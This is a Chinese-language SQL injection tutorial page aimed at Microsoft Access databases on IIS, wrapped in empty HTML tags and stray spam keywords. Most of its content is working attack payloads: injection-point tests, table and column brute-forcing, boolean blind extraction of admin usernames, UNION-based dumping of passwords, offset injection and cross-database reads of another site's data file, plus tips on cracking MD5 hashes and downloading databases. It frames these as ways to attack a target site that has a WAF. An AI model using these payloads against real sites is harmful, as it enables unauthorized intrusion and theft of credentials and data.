<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                企業??AI智能體構建引擎,智能編排和調試,一鍵部署,支持知識庫和私有化部署方案 廣告
                [toc] Access數據庫windows平臺下的小型數據庫,搭建方便,維護簡單,因此一般是與windowns下的iis中間件一起用的 ## 找注入點并確定數據庫類型 找注入點 ```SQL '? ? ? ? ● 返回錯誤 and 1=1? ??●返回正常 and 1=2? ??● 返回錯誤 # 滿足以上條件即存在注入 ``` 判斷iis后的數據庫類型 ```sql and exists (select * from msysobjects)>0 ●返回正常,即可判斷其為Access數據庫 and exists (select * from sysobjects)>0 ●返回正常,即可判斷其為MSSQL數據庫 ``` ## 猜數據庫名和字段 access數據庫沒有有效辦法獲取庫表名,只能通過暴力破解的方式一個一個的嘗試 **猜解數據庫表名** access數據庫沒有庫名的概念,直接就是表 ```SQL and exists(select * from 表名) # 一個一個猜,猜中為止,例如: http://XXX?id=1 and exists(select * from users) http://XXX?id=1 and exists(select * from admin) http://XXX?id=1 and exists(select * from administrator) ``` **猜字段:** ```sql and exists(select 字段名 from 表名) # 一個一個猜,猜中為止 例如: http://XXX?id=1 and exists(select username from administrator) http://XXX?id=1 and exists(select user_name from administrator) http://XXX?id=1 and exists(select password from administrator) ``` ## 爆破access中的數據 ### 猜字段長度和數據(標準) **猜解字段長度** 通過上述步驟可以知道,數據庫表名是“administrator”,表中字段有“user_name”和“password”。 ```sql #用返回的對錯猜測 and (select top 1 len(user_name) from administrator)>xx #如以下報錯,可確定字段數目為5 http://xxx?id=14 and (select top 1 len(user_name) from administrator)>3 ●正常 http://xxx?id=14 and (select top 1 len(user_name) from administrator)>4 ●正常 http://xxx?id=14 and (select top 1 len(user_name) from administrator)>5 ●報錯 ``` **猜解字段內容** ```sql and (select top 1 asc(mid(user_name,1,1)) from administrator)>xx #先判斷第一個字母,是漢字還是字母 ## 返回正常頁面說明ASCII值大于0 ,是字母 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>0 # 二分法確定acsii碼, http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>100 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>50 http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>75 # 最后根據確定下來的acsii碼97,反查對應表得到第一個字母為a,在用同樣的方法確定出來其他位字母 ## 密碼的話一般會做md5加密,記得用網站的解密工具嘗試(簡單的可以反解成功) ``` >小提示: access數據庫都是存放在網站目錄下,后綴格式為mdb,asp,asa,可以通過一些暴庫手段、目錄猜解等直接下載數據庫,如果是MSSQL、MYSQL等,一般數據庫是存儲在數據庫安裝路徑下,后綴格式為myi,myd,frm,mdf 不能通過下載得到庫。除非走狗屎運,對方管理員把網站庫備份在網站目錄下。 ### 用聯合查詢方案注入(通用) 首先還是要先猜解出所需的表的表名和字段名,這個沒有辦法 再用order by語句排序,根據排序數量,可知當前頁面可查詢字段數,假設為7 再通過union查詢數字,確定出頁面可顯示的字段(假設是第2和3字段) 最后通過union語句聯合查詢指定表(在可顯示的字段替換為需要查詢的表中的字段) ```sql order by 7 and 1=2 union select 1,2,3,4,5,6,7 from admin and 1=2 union select 1,user_name,passwoed,4,5,6,7 from admin ``` ## 偏移注入和跨庫查詢 ### 偏移注入 偏移注入會隨機爆出一個字段內容,具體是什么看運氣 偏移注入只針對Access數據庫,當我們只猜到數據庫表名但猜不到列名的情況下,這種方法可以幫我們填補。 ```url #第一步:使用之前的方法得到顯示點為2,3,字段個數為7,但是我們并不知道列名 http://XXX?id=14 union select 1,2,3,4,5,6,7 from administrator #第二步:用*依次向前替換數字字段,直到頁面顯示正常。例如在5替換為*后頁面返回正常 http://XXX?id=14union select 1,2,3,4,* from administrator #說明星號替換了3個字段(也就是表中有三個字段),后續要使用inner jion自表連接查詢,因此計算字段數乘以2是否小于當前列(3*2<7) #第三步:公式成立的話,用inner jion自連接查詢 http://XXX?id=14 union select 1,* from (administrator as a inner join administrator as b on a.id=b.id) #如果是更多位,可再接inner join http://XXX?id=14 union select 1,* from ((administrator as a inner join administrator as b on a.id=b.id) inner join administrator as c a.id=c.id) ``` ### 跨庫查詢 假設a和b兩個站點在同一服務器上面,但a服務器上面安裝了安全狗、Waf這樣的安全軟件,現在我們要對a站點進行攻擊,但是沒發現什么大漏洞,只找到網站數據庫路徑,對數據庫下載發現下載不了。 這個時候我發現b站點有注入點。并且知道了“2和3”是注入點,可以通過跨庫的方式,讀取指定目錄下access數據庫的數據。 ```url http://xxx?id=14 union select 1,adminpassword,username,4,5,6,7 from[C:\wwwtest\2AspCMS\AspCms_data\data.asp].Aspcms_Admins ```
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看